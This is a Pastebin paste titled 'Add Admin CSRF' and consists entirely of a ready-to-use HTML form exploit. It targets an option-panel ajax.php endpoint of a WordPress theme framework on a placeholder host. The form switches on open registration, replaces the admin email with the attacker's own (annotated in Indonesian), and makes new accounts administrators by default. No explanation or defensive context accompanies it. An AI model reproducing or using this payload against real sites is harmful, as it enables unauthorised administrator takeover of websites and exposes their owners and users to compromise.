Advertisement
humarb

Add Admin CSRF

Jan 20th, 2017
228
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.54 KB | None | 0 0
  1. http://humartutor.blogspot.com
  2. <form action="http://target.com/wp-content/themes/nama tema/hades_framework/option_panel/ajax.php" method="POST">
  3. <input name="values[0][name]" value="users_can_register">
  4. <input name="values[0][value]" value="1">
  5. <input name="values[1][name]" value="admin_email">
  6. <input name="values[1][value]" value="email ente yg masih aktip">
  7. <input name="values[2][name]" value="default_role">
  8. <input name="values[2][value]" value="administrator">
  9. <input name="action" value="save">
  10. <input type="submit" value="Submit">
  11. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement